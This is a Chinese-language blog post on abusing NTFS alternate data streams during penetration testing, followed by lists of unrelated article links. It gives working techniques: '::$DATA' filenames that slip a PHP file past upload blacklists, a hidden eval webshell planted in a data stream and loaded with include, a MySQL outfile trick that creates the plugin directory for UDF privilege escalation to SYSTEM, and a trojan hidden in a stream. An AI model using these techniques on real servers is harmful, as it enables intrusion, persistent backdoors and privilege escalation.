有关ADS的简单说明请看http://www.xfocus.net/articles/200212/466.html
可以看到ADS在很久以前就被一些安全人员所关注，并且也提出了一些经典的利用，比如隐藏文件，隐藏
webshell（http://blog.csdn.net/lake2/article/details/269659），随着这次爆出来的IIS的
权限绕过，我们再次测试了一下ADS在渗透中的利用方法，并发现了一些比较有意思的现象。

1 经典的IIS 目录访问权限绕过：

详见：http://www.exploit-db.com/exploits/19033/

注：这里的权限是NTFS目录属性的权限，并非说是后台直接绕过。别误会。

2 Bypass 黑名单验证

在测试中我们发现，如果上传的文件名字为：test.php::$DATA，会在服务器上生成一个test.php的文件，其中内容和所上传文件
内容相同，并被解析。假设我们需要上传的文件内容为：<?php phpinfo();?>下面是上传是会出现的现象：

上传的文件名  服务器表面现象    生成的文件内容

Test.php:a.jpg     生成Test.php  空

Test.php::$DATA  生成test.php  <?php phpinfo();?>

Test.php::$INDEX_ALLOCATION  生成test.php文件夹  

Test.php::$DATA\0.jpg  生成0.jpg  <?php phpinfo();?>

Test.php::$DATA\aaa.jpg  生成aaa.jpg  <?php phpinfo();?>

PS: 上传test.php:a.jpg的时候其实是在服务器上正常生成了一个数据流文件，可以通过notepad test.php:a.jpg查看内容，而test.php为空也是正常的。

  根据第二个现象，我们可以bypass一些黑名单验证。

  后面我加\0测试的时候是想截断后面的东西，但是发现windows会无视”/””\”这两个符号前面的东西，只识别这俩符号后的字符串。(由于windows把\ /当成了目录，而上传只认识文件名所导致的)

3 在隐藏webshell中的利用：

方法：在服务器上echo一个数据流文件进去，比如index.php是网页正常文件，我们可以这样子搞： echo ^<?php @eval(request[cmd])?^>  > index.php:hidden.jpg

这样子就生成了一个不可见的shell
hidden.jpg，常规的文件管理器、type命令，dir命令、del命令发现都找不出那个hidden.jpg的。我们可以在另外一个正常文件里
把这个ADS文件include进去，<?php
include(‘index.php:hidden.jpg’)?>，这样子就可以正常解析我们的一句话了。

4 UDF提权中的利用

UDF提权tips：如果数据库用户对数据库mysql（注意指的是数据库里的默认库mysql）具有insert和delete权限，就可以创
建加载自定义函数。而又由于mysql是以system权限运行在windows主机上，所以这个时候我们就可以通过自定义函数以system权限执行命
令了。

Mysql
5.1以上（现在都5.6版本了，估计老版的不常见了。），在加载自定义函数的DLL时，要求目录必须是mysql目录下的lib\plugin\目录。
直接导入C:\windows\system32这种目录是加载不了dll的，也就没办法creat function。但是可悲的是mysql
5.1之后的版本在安装的时候是默认不存在lib\plugin目录的，除非你安装的是完整版（官方的那种200多M的）。

还有一些情况，比如：你获取webshell了，但是webshell权限被限制的很死，根本没办法新建lib\plugin目录，或者你根本就
没有webshell，只有一个Mysql的弱口令（http://blog.sina.com.cn/s
/blog_6ca7b58101013kt4.html）。在以前估计就是只有放弃了，但是利用ADS我们则可以bypass掉这个限制。

demo :

select 'xxx' into outfile 'D:\\mysql\\lib::$INDEX_ALLOCATION';

会在mysql目录下生成一个lib目录

5 利用ADS隐藏木马

隐藏好办，直接在cmd里面执行命令: type muma.ext test.txt:muma.exe

这样就把木马写进test.txt的数据流里了。但是想运行的话还得借助其他工具，winrar就是一个，具体方法百度百科里都有，但是百科里的别信，成功不了，需要用type命令才能将二进制可执行文件写进去的。

Winrar的自解压木马我还是觉得不靠谱，毕竟后缀是exe，如果目标连这个都确定不了，那还不如直接发muma.exe。所以这个利用我也没怎么研究了。

注：数据流中如果是可执行文件，用start命令调用时，需要在win xp 和2003环境下，win7下失败。

相关信息下载：NTFS-ADS

最新文章

1. 搞不清FastCgi与PHP-fpm之间是个什么样的关系？
2. 在IE6、IE7中实现块元素的inline-block效果
3. Java处理excel文件
4. MongoDB副本集学习(二)：基本测试与应用
5. [SQL]select scope_identity()传回插入相同范围之识别资料行中的最后一个识别值
6. rman的conver方法拷贝ASM文件
7. 1、&lt;img /&gt;标签
8. 201621123031 《Java程序设计》第7周学习总结
9. spring-config的坑
10. [转] Shell编程之数组使用
11. [leetcode]43. Multiply Strings高精度乘法
12. Vijos1910 NOIP2014提高组 Day2T3 解方程 其他
13. 【OJ】 : 容斥原理计算出 1&lt; =n &lt; 1e9 中是2,3,5倍数的整数的数量
14. python模块之xlrd
15. css布局你该了解的
16. okhttp3带cookie请求
17. springMVC入门-07
18. 百度地图地址解析(百度Geocoding API)
19. 笔记：HTML5中input元素新增的type值
20. 20155318 《Java程序设计》实验五 （网络编程与安全）实验报告

热门文章

1. NOI模拟(3.3)螺旋序列（出题人一定是月厨）
2. Automation 的 ReportFlow
3. [cf360 div1.C]The Values You Can Make[Dp]
4. Linux下汇编语言学习笔记21 ---
5. 通过setContentView设置activity的不同样式
6. ****Call to a member function item() on a non-object
7. operamasks—omGrid/omBorderLayout的混合使用
8. operamasks—omMessageTip的使用
9. 使用go语言实现简单的反向代理工具激活IntelliJ和PyCharm，持续更新
10. [React] Use Prop Collections with Render Props